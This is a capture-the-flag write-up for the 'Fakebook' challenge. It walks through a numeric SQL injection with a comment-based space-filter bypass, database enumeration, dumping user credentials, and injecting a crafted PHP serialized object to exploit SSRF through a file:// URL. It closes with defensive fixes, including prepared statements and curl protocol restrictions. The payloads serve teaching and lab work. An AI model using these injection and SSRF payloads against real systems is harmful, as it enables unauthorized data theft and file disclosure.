[netding Cup 2018] Fakebook records
2022-07-26 23:53:00 【Aiwin-Lau】
1. Entering the environment

There are registration and login pages. Could there be second-order SQL injection? Register, log in and have a look.

After logging in, the username is a link to view.php, and the URL is view.php?no=1, so try numeric injection. First no=1' and 1=1-- throws an error; the error message reveals the web root /var/www/html and that the backend is a MariaDB database. The error also shows that the quote is not needed, so try no=1 and 1=2, which errors, while no=1 and 1=1 returns without error: there is a numeric injection.
Use order by to find the number of columns:
view.php?no=1 order by 4 returns no error
view.php?no=1 order by 5 gives Unknown column '5' in 'order clause'
So there are 4 columns.
Now try a normal union select: view.php?no=-1 union select 1,2,3,4 returns no back, so spaces are probably filtered. After replacing spaces with /**/ to bypass the filter, the echo appears in the username position.
Dump the database name:
view.php?no=-1/**/union/**/select/**/1,(select/**/database()),3,4
Gives the database fakebook.
Dump the table names:
?no=-1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),3,4
Gives the users table.
Dump the column names:
/view.php?no=-1/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()),3,4
Gives the columns no,username,passwd,data.
Dump the data:
view.php?no=-1/**/union/**/select/**/1,(select/**/group_concat(username,'~',passwd,'~',data)/**/from/**/fakebook.users),3,4
Result:
aiwin~3c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2~O:8:"UserInfo":3:{s:4:"name";s:5:"aiwin";s:3:"age";i:20;s:4:"blog";s:7:"aaa.com";}
The data column is not the flag but a serialized string, which suggests PHP deserialization is involved. Next, enumerate directories.

Visiting robots.txt reveals user.php.bak, which can be downloaded for the source code:
```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    # Constructor
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    # Use get() to fetch the blog contents
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    # Restricts the input of the blog field
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
```

A few of the cURL functions used:
curl_setopt: sets an option on a cURL transfer.
CURLOPT_URL: the URL to fetch; it can also be set in curl_init().
CURLOPT_RETURNTRANSFER: return the result of curl_exec() as a string instead of outputting it directly.
curl_exec: perform a cURL session.
curl_getinfo: get information about the cURL connection resource handle.
```php
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if($httpCode == 404) {
        return 404;
    }
    curl_close($ch);
    return $output;
}
```

curl_exec() fetches the URL stored in the blog field without any filtering, so there is an SSRF (server-side request forgery).
Since data is stored as a serialized string, it is presumably unserialized before use. Passing a crafted serialized string with blog set to a file:// URL should work, and the SSRF can then read files through the file pseudo-protocol, which should expose the flag.
```php
<?php
class UserInfo
{
    public $name = "aiwin";
    public $age = 20;
    public $blog = "file:///var/www/html/flag.php";
}
$a = new UserInfo();
print(serialize($a));
```

Inject the serialized object into the data position:
view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"aiwin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
Decoding the base64 in the page source gives the flag.
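The fixes a defender would apply to the two weaknesses this writeup chains (a no parameter concatenated into SQL, and an unrestricted curl fetch of a blog value that arrives through unserialize() without ever passing isValidBlog()), as an added example that is not the challenge's code: it assumes a PDO connection $pdo, the users table and no column from the writeup, and that view.php calls getBlogContents() on the unserialized UserInfo.

```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
    // Scheme allow-list; (string) covers parse_url() returning null/false.
    private static function allowedUrl($url)
    {
        $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
        return in_array($scheme, ["http", "https"], true);
    }
    public function isValidBlog()
    {
        return self::allowedUrl($this->blog);
    }
    // Runs on unserialize(): the original class only validated at registration,
    // so a crafted data column reached get() without passing isValidBlog().
    public function __wakeup()
    {
        if (!$this->isValidBlog()) {
            $this->blog = "";
        }
    }
    public function get($url)
    {
        if (!self::allowedUrl($url)) {
            return 404;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // libcurl itself refuses file://, gopher://, dict:// and so on, and
        // redirects are not followed, so an http target cannot bounce elsewhere.
        curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return $httpCode == 404 ? 404 : $output;
    }
}

// view.php: bind no as an integer instead of concatenating it into the SQL,
// which closes the numeric injection ($pdo is an assumed PDO connection).
$stmt = $pdo->prepare("SELECT no, username, passwd, data FROM users WHERE no = ?");
$stmt->bindValue(1, (int)$_GET["no"], PDO::PARAM_INT);
$stmt->execute();
```

With CURLOPT_PROTOCOLS set, a stored blog of file:///var/www/html/flag.php fails inside libcurl even if a future code change drops the PHP-side check, so the two layers are independent.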